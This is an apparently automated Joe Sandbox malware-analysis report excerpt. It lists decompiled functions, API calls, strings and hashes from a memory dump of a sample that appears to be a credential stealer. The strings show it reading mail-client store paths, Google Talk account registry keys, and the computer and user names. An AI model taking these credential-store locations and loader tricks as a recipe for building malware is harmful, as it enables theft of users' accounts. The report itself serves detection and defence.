                                            • Instruction Fuzzy Hash: BA316F72508348AFE750DF51DC81E5BBBECFB88358F04093EBA94E2151D735D9188B6A
                                            Function 004442EA Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 97stringCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            APIs
                                            • memset.MSVCRT ref: 0044430B
                                              • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075A0
                                              • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075AB
                                              • Part of subcall function 0040759E: _mbscat.MSVCRT ref: 004075C2
                                              • Part of subcall function 00410DBB: memset.MSVCRT ref: 00410E10
                                              • Part of subcall function 00410DBB: RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,00000104), ref: 00410E79
                                              • Part of subcall function 00410DBB: _mbscpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 00410E87
                                            • memset.MSVCRT ref: 00444379
                                            • memset.MSVCRT ref: 00444394
                                              • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                            • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000000,00000104,00000104,?,?,?,?), ref: 004443CD
                                            • strlen.MSVCRT ref: 004443DB
                                            • _strcmpi.MSVCRT ref: 00444401
                                            Strings
                                            • Store Root, xrefs: 004443A5
                                            • \Microsoft\Windows Live Mail, xrefs: 00444350
                                            • \Microsoft\Windows Mail, xrefs: 00444329
                                            • Software\Microsoft\Windows Live Mail, xrefs: 004443AA
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.3381339664.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000D.00000002.3381339664.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000D.00000002.3381339664.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: memset$strlen$Close$EnvironmentExpandStrings_mbscat_mbscpy_strcmpi
                                            • String ID: Software\Microsoft\Windows Live Mail$Store Root$\Microsoft\Windows Live Mail$\Microsoft\Windows Mail
                                            • API String ID: 832325562-2578778931
                                            • Opcode ID: f06a6af35cb714c64aa9cbb6cf4603c577f85108f01cf4c992da9f1fa1720a8e
                                            • Instruction ID: c969096c6c8075cae9da81fbffcb27ba025b1fc1210c9b39c3855a2ab2b3ab2e
                                            • Opcode Fuzzy Hash: f06a6af35cb714c64aa9cbb6cf4603c577f85108f01cf4c992da9f1fa1720a8e
                                            • Instruction Fuzzy Hash: A73197725083446BE320EA99DC47FCBB7DC9B85315F14441FF64897182D678E548877A
                                            Function 0040F460 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 180registryCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 301 40f460-40f5bd memset * 2 call 4078ba * 2 RegOpenKeyExA 306 40f5c3-40f5ea RegQueryValueExA 301->306 307 40f6d9-40f6df 301->307 308 40f6d0-40f6d3 RegCloseKey 306->308 309 40f5f0-40f5f4 306->309 308->307 309->308 310 40f5fa-40f604 309->310 311 40f606-40f618 call 40466b call 404734 310->311 312 40f677 310->312 322 40f66a-40f675 call 404785 311->322 323 40f61a-40f63e call 4047a5 311->323 313 40f67a-40f67d 312->313 313->308 315 40f67f-40f6bf call 4012ee RegQueryValueExA 313->315 315->308 321 40f6c1-40f6cf 315->321 321->308 322->313 323->322 328 40f640-40f643 323->328 329 40f661-40f664 LocalFree 328->329 330 40f645-40f65a memcpy 328->330 329->322 330->329
                                            APIs
                                            • memset.MSVCRT ref: 0040F567
                                            • memset.MSVCRT ref: 0040F57F
                                              • Part of subcall function 004078BA: _mbsnbcat.MSVCRT ref: 004078DA
                                            • RegOpenKeyExA.KERNELBASE(80000001,00000082,00000000,00020019,?,?,?,?,?,00000000), ref: 0040F5B5
                                            • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000082,?,?,?,?,00000000), ref: 0040F5E2
                                            • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,000000BE,000000BE,?,?,?,?,00000000), ref: 0040F6B7
                                              • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                                              • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                              • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                            • memcpy.MSVCRT(00000020,?,?,?,00000000,?,?,?,?,?,00000000), ref: 0040F652
                                            • LocalFree.KERNEL32(?,?,00000000,?,?,?,?,?,00000000), ref: 0040F664
                                            • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000), ref: 0040F6D3
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.3381339664.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000D.00000002.3381339664.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000D.00000002.3381339664.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: QueryValuememset$AddressCloseFreeLibraryLoadLocalOpenProc_mbscpy_mbsnbcatmemcpy
                                            • String ID:
                                            • API String ID: 2012582556-3916222277
                                            • Opcode ID: 8f617e2db47743eab2de2860531f70ca5c395556099eb0f489e65365eb291258
                                            • Instruction ID: 8a535e2a1d92942c08e22e27bc62a3a9d9c5418ddd7b2e408e782496f1cf9495
                                            • Opcode Fuzzy Hash: 8f617e2db47743eab2de2860531f70ca5c395556099eb0f489e65365eb291258
                                            • Instruction Fuzzy Hash: 9E81FC218047CEDEDB31DBBC8C485DDBF745B17224F0843A9E5B47A2E2D3245646C7AA
                                            Function 004037CA Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 86stringCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 331 4037ca-40381c memset * 2 call 444551 334 4038e2-4038e5 331->334 335 403822-403882 call 4021b6 call 406f06 * 2 strchr 331->335 342 403884-403895 _mbscpy 335->342 343 403897-4038a2 strlen 335->343 344 4038bf-4038dd _mbscpy call 4023e5 342->344 343->344 345 4038a4-4038bc sprintf 343->345 344->334 345->344
                                            APIs
                                            • memset.MSVCRT ref: 004037EB
                                            • memset.MSVCRT ref: 004037FF
                                              • Part of subcall function 00444551: memset.MSVCRT ref: 00444573
                                              • Part of subcall function 00444551: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 004445DF
                                              • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                              • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001,00000104,?,?,?,?,?,00000000), ref: 00406F20
                                            • strchr.MSVCRT ref: 0040386E
                                            • _mbscpy.MSVCRT(?,?,?,?,?), ref: 0040388B
                                            • strlen.MSVCRT ref: 00403897
                                            • sprintf.MSVCRT ref: 004038B7
                                            • _mbscpy.MSVCRT(?,?,?,?,?), ref: 004038CD
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.3381339664.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000D.00000002.3381339664.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000D.00000002.3381339664.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: memset$_mbscpystrlen$Closememcpysprintfstrchr
                                            • String ID: %s@yahoo.com
                                            • API String ID: 317221925-3288273942
                                            • Opcode ID: 5a56a1554c10d755001c1ca11538bf46cd5ff9b3743cfe338c5787e90ef4e93f
                                            • Instruction ID: 76d3f49adc6711096ede71316d8c54080aa8a6e72e6628a7d10ff16d2d587f45
                                            • Opcode Fuzzy Hash: 5a56a1554c10d755001c1ca11538bf46cd5ff9b3743cfe338c5787e90ef4e93f
                                            • Instruction Fuzzy Hash: 4B2154B3D001285EEB11EA54DD42FDA77ACDF85308F0404EBB649F7041E678AF888A59
                                            Function 004034E4 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 47COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 347 4034e4-403544 memset * 2 call 410b1e 350 403580-403582 347->350 351 403546-40357f _mbscpy call 406d55 _mbscat call 4033f0 347->351 351->350
                                            APIs
                                            • memset.MSVCRT ref: 00403504
                                            • memset.MSVCRT ref: 0040351A
                                              • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                            • _mbscpy.MSVCRT(00000000,00000000), ref: 00403555
                                              • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                              • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                            • _mbscat.MSVCRT ref: 0040356D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.3381339664.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000D.00000002.3381339664.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000D.00000002.3381339664.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: _mbscatmemset$Close_mbscpystrlen
                                            • String ID: InstallPath$Software\Group Mail$fb.dat
                                            • API String ID: 3071782539-966475738
                                            • Opcode ID: e8255885af10a91bc56e48e40ef87396276e308e7910b77f5f681434f29254a3
                                            • Instruction ID: a2fd564f6d67a76fe1541fb13c78ccc0c8ee6374decffd3371ae058987aad369
                                            • Opcode Fuzzy Hash: e8255885af10a91bc56e48e40ef87396276e308e7910b77f5f681434f29254a3
                                            • Instruction Fuzzy Hash: C201FC7694416875E750F6659C47FCAB66CCB64705F0400A7BA48F30C2DAF8BBC486A9
                                            Function 0040CCD7 Relevance: 9.1, APIs: 6, Instructions: 71windowCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 356 40ccd7-40cd06 ??2@YAPAXI@Z 357 40cd08-40cd0d 356->357 358 40cd0f 356->358 359 40cd11-40cd24 ??2@YAPAXI@Z 357->359 358->359 360 40cd26-40cd2d call 404025 359->360 361 40cd2f 359->361 363 40cd31-40cd57 360->363 361->363 364 40cd66-40cdd9 call 407088 call 4019b5 memset LoadIconA call 4019b5 _mbscpy 363->364 365 40cd59-40cd60 DeleteObject 363->365 365->364
                                            APIs
                                            • ??2@YAPAXI@Z.MSVCRT(00000014,00000000), ref: 0040CCFE
                                            • ??2@YAPAXI@Z.MSVCRT(00001324,00000000), ref: 0040CD1C
                                            • DeleteObject.GDI32(?), ref: 0040CD5A
                                            • memset.MSVCRT ref: 0040CD96
                                            • LoadIconA.USER32(00000065), ref: 0040CDA6
                                            • _mbscpy.MSVCRT(?,00000000,?,00000000), ref: 0040CDC4
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.3381339664.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000D.00000002.3381339664.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000D.00000002.3381339664.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: ??2@$DeleteIconLoadObject_mbscpymemset
                                            • String ID:
                                            • API String ID: 2054149589-0
                                            • Opcode ID: fd02f05bf49073eee5ccc1a550db9cbce84ddbb83c717146c7427eb187f58741
                                            • Instruction ID: e49e2262ea613e2b532621416bf92f05b9d60d1a181aada648b692035ce2a44d
                                            • Opcode Fuzzy Hash: fd02f05bf49073eee5ccc1a550db9cbce84ddbb83c717146c7427eb187f58741
                                            • Instruction Fuzzy Hash: C921A1B0900360DBDB10DF749DC97897BA8EB40B04F1405BBED08FF286D7B895408BA8
                                            Function 0044B40E Relevance: 9.1, APIs: 6, Instructions: 65libraryloaderCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 373 44b40e-44b415 GetModuleHandleA 374 44b455 373->374 375 44b417-44b426 call 44b42b 373->375 377 44b457-44b45b 374->377 385 44b48d 375->385 386 44b428-44b433 GetProcAddress 375->386 379 44b45d-44b465 GetModuleHandleA 377->379 380 44b49a call 44b49f 377->380 383 44b467-44b46f 379->383 383->383 384 44b471-44b474 383->384 384->377 388 44b476-44b478 384->388 389 44b48e-44b496 385->389 386->374 387 44b435-44b442 VirtualProtect 386->387 390 44b454 387->390 391 44b444-44b452 VirtualProtect 387->391 392 44b47e-44b486 388->392 393 44b47a-44b47c 388->393 395 44b498 389->395 390->374 391->390 396 44b487-44b488 GetProcAddress 392->396 393->396 395->384 396->385
                                            APIs
                                            • GetModuleHandleA.KERNEL32(0044B405), ref: 0044B40E
                                            • GetModuleHandleA.KERNEL32(?,0044B405), ref: 0044B460
                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 0044B488
                                              • Part of subcall function 0044B42B: GetProcAddress.KERNEL32(00000000,0044B41C), ref: 0044B42C
                                              • Part of subcall function 0044B42B: VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,0044B41C,0044B405), ref: 0044B43E
                                              • Part of subcall function 0044B42B: VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,0044B41C,0044B405), ref: 0044B452
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.3381339664.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000D.00000002.3381339664.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000D.00000002.3381339664.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: AddressHandleModuleProcProtectVirtual
                                            • String ID:
                                            • API String ID: 2099061454-0
                                            • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                            • Instruction ID: 5df47aada64e755ddaac71019e2cddcac14d14db73bdb0f929895f2225ac57a9
                                            • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                            • Instruction Fuzzy Hash: DB012D01545A4179FF21AAB50C02ABB5F8CDA23364B145B4BF750CB293DB5CC90693FE
                                            Function 004085D2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79registryCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            APIs
                                              • Part of subcall function 004082CD: memset.MSVCRT ref: 0040832F
                                              • Part of subcall function 004082CD: memset.MSVCRT ref: 00408343
                                              • Part of subcall function 004082CD: memset.MSVCRT ref: 0040835F
                                              • Part of subcall function 004082CD: memset.MSVCRT ref: 00408376
                                              • Part of subcall function 004082CD: GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                              • Part of subcall function 004082CD: GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                              • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                              • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                              • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083E9
                                              • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083F8
                                              • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00410E4A,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 00410AAF
                                            • memset.MSVCRT ref: 00408620
                                              • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                            • memset.MSVCRT ref: 00408671
                                            • RegCloseKey.ADVAPI32(?,?,?), ref: 004086AF
                                            • RegCloseKey.ADVAPI32(?), ref: 004086D6
                                            Strings
                                            • Software\Google\Google Talk\Accounts, xrefs: 004085F1
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.3381339664.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000D.00000002.3381339664.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000D.00000002.3381339664.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: memset$ByteCharCloseMultiNameWidestrlen$ComputerEnumOpenUser
                                            • String ID: Software\Google\Google Talk\Accounts
                                            • API String ID: 1366857005-1079885057
                                            • Opcode ID: 714fcd6f1c4457602f236ccea557fa2655140a2be8e65fd4c30709a0660f34b2
                                            • Instruction ID: c9a55fd20ea1a9e1148d2ba128c2c272dfe10edd9ec9a97c612e1cc238572be2
                                            • Opcode Fuzzy Hash: 714fcd6f1c4457602f236ccea557fa2655140a2be8e65fd4c30709a0660f34b2
                                            • Instruction Fuzzy Hash: 6E2181B140830AAEE610EF51DD42EAFB7DCEF94344F00083EB984D1192E675D95D9BAB
                                            Function 0040BA28 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 72COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 421 40ba28-40ba3a 422 40ba87-40ba9b call 406c62 421->422 423 40ba3c-40ba52 call 407e20 _mbsicmp 421->423 445 40ba9d call 4107f1 422->445 446 40ba9d call 404734 422->446 447 40ba9d call 404785 422->447 448 40ba9d call 403c16 422->448 449 40ba9d call 410a9c 422->449 428 40ba54-40ba6d call 407e20 423->428 429 40ba7b-40ba85 423->429 434 40ba74 428->434 435 40ba6f-40ba72 428->435 429->422 429->423 431 40baa0-40bab3 call 407e30 438 40bab5-40bac1 431->438 439 40bafa-40bb09 SetCursor 431->439 437 40ba75-40ba76 call 40b5e5 434->437 435->437 437->429 441 40bac3-40bace 438->441 442 40bad8-40baf7 qsort 438->442 441->442 442->439 445->431 446->431 447->431 448->431 449->431
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.3381339664.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000D.00000002.3381339664.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000D.00000002.3381339664.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: Cursor_mbsicmpqsort
                                            • String ID: /nosort$/sort
                                            • API String ID: 882979914-1578091866
                                            • Opcode ID: c670c5a1dac652336fc4502d32cc243de18414890d70e9aadfbf467d7e8899fc
                                            • Instruction ID: 8a1fc52e493d51bfa0df36ad286e8752cb28bf69c391dd95ac0f49afa8242728
                                            • Opcode Fuzzy Hash: c670c5a1dac652336fc4502d32cc243de18414890d70e9aadfbf467d7e8899fc
                                            • Instruction Fuzzy Hash: 2D2192B1704601EFD719AF75C880A69B7A9FF48318B10027EF419A7291CB39BC12CBD9
                                            Function 0044B3CF Relevance: 7.6, APIs: 5, Instructions: 100libraryloaderCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetModuleHandleA.KERNEL32(?,0044B405), ref: 0044B460
                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 0044B488
                                              • Part of subcall function 0044B40E: GetModuleHandleA.KERNEL32(0044B405), ref: 0044B40E
                                              • Part of subcall function 0044B40E: GetProcAddress.KERNEL32(00000000,0044B41C), ref: 0044B42C
                                              • Part of subcall function 0044B40E: VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,0044B41C,0044B405), ref: 0044B43E
                                              • Part of subcall function 0044B40E: VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,0044B41C,0044B405), ref: 0044B452
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.3381339664.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000D.00000002.3381339664.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000D.00000002.3381339664.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: AddressHandleModuleProcProtectVirtual
                                            • String ID:
                                            • API String ID: 2099061454-0
                                            • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                            • Instruction ID: 9d5022db8ba3b04779ac2e9664088e7462d9cf1087a2f4409b49694314ac1291
                                            • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                            • Instruction Fuzzy Hash: FB21F7114496816FFB218BB84C017B67BD8DB13364F19469BE184CB243D76CD85693FA
                                            Function 0044B42B Relevance: 7.6, APIs: 5, Instructions: 54librarymemoryloaderCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetProcAddress.KERNEL32(00000000,0044B41C), ref: 0044B42C
                                            • VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,0044B41C,0044B405), ref: 0044B43E
                                            • VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,0044B41C,0044B405), ref: 0044B452
                                            • GetModuleHandleA.KERNEL32(?,0044B405), ref: 0044B460
                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 0044B488
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.3381339664.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000D.00000002.3381339664.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000D.00000002.3381339664.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: AddressProcProtectVirtual$HandleModule
                                            • String ID:
                                            • API String ID: 2152742572-0
                                            • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                            • Instruction ID: 565c9894d902a96607ae12053a83652f4dbbb150929c791eaa1536a67b179355
                                            • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                            • Instruction Fuzzy Hash: 83F0C201589A407DFE2155B50C42ABB5B8CCA27320B244B07F654CB383D79DC91A93FA
                                            Function 00410DBB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 74registryCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 00410D0E: LoadLibraryA.KERNEL32(shell32.dll,0040CF6F,74DF0A60,?,00000000), ref: 00410D1C
                                              • Part of subcall function 00410D0E: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 00410D31
                                            • memset.MSVCRT ref: 00410E10
                                            • RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,00000104), ref: 00410E79
                                            • _mbscpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 00410E87
                                              • Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8
                                            Strings
                                            • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00410E2B, 00410E3B
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.3381339664.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000D.00000002.3381339664.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000D.00000002.3381339664.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: AddressCloseLibraryLoadProcVersion_mbscpymemset
                                            • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                            • API String ID: 889583718-2036018995
                                            • Opcode ID: 20c56a313fda590c221b6e52e0c08165982b45312d52e9976c101796b2ccff0c
                                            • Instruction ID: 345612a4203e2947e26158410096d7c3d27216bde768142914c78e2e12d87323
                                            • Opcode Fuzzy Hash: 20c56a313fda590c221b6e52e0c08165982b45312d52e9976c101796b2ccff0c
                                            • Instruction Fuzzy Hash: 89110D71C40318EBEB20B6D59C86EEF77ACDB14304F1404A7F555A2112E7BC9ED8C69A
                                            Function 00410C68 Relevance: 6.1, APIs: 4, Instructions: 58COMMON
                                            Download Yara Rule
                                            APIs
                                            • FindResourceA.KERNEL32(?,?,?), ref: 00410C75
                                            • SizeofResource.KERNEL32(?,00000000), ref: 00410C86
                                            • LoadResource.KERNEL32(?,00000000), ref: 00410C96
                                            • LockResource.KERNEL32(00000000), ref: 00410CA1
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.3381339664.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000D.00000002.3381339664.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000D.00000002.3381339664.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: Resource$FindLoadLockSizeof
                                            • String ID:
                                            • API String ID: 3473537107-0
                                            • Opcode ID: bd954622ed218253ef2d1b1e463bd565b46b01af85fc050a190cf1e92aec0d28
                                            • Instruction ID: 06b8370cebe37c7de172ca18b7cbf64f7437cd91f528590ddf6fb1777473d23a
                                            • Opcode Fuzzy Hash: bd954622ed218253ef2d1b1e463bd565b46b01af85fc050a190cf1e92aec0d28
                                            • Instruction Fuzzy Hash: 090196367012166F8B185F69DD9489F7EAEFB853913084136FC05C6361EB71C9818ED8
                                            Function 004109CF Relevance: 6.1, APIs: 4, Instructions: 52COMMON
                                            Download Yara Rule
                                            APIs
                                            • memset.MSVCRT ref: 004109F7
                                              • Part of subcall function 004075CD: sprintf.MSVCRT ref: 00407605
                                              • Part of subcall function 004075CD: memcpy.MSVCRT(?,00000000,00000003,00000000,%2.2X ,?), ref: 00407618
                                            • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 00410A1B
                                            • memset.MSVCRT ref: 00410A32
                                            • GetPrivateProfileStringA.KERNEL32(?,?,0044C52F,?,00002000,?), ref: 00410A50
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.3381339664.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000D.00000002.3381339664.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000D.00000002.3381339664.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: PrivateProfileStringmemset$Writememcpysprintf
                                            • String ID:
                                            • API String ID: 3143880245-0
                                            • Opcode ID: 886dc5ecc355c3466c5937889f3c24e8c73449ac36ec953dbb08d3698ea6811a
                                            • Instruction ID: 950c872411b2f2d44c5e3370b52dcf3132a88c3cdc41bb294f16927293e6b240
                                            • Opcode Fuzzy Hash: 886dc5ecc355c3466c5937889f3c24e8c73449ac36ec953dbb08d3698ea6811a
                                            • Instruction Fuzzy Hash: A401A172804319BBEF119F50DC86EDB7B7CEF05344F0000A6F604A2052E635AA64CBA9
                                            Function 0044B33B Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.3381339664.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000D.00000002.3381339664.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000D.00000002.3381339664.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: ??3@
                                            • String ID:
                                            • API String ID: 613200358-0
                                            • Opcode ID: 0ad1635ea08d581da3d46e9cfe4a801b3f478eb4f35f0f6f88290fc2b5bda708
                                            • Instruction ID: 5841ab7dcc50b440abd9236b7832042a9d7d1d7b8957bb774bcacf87f05c1f29
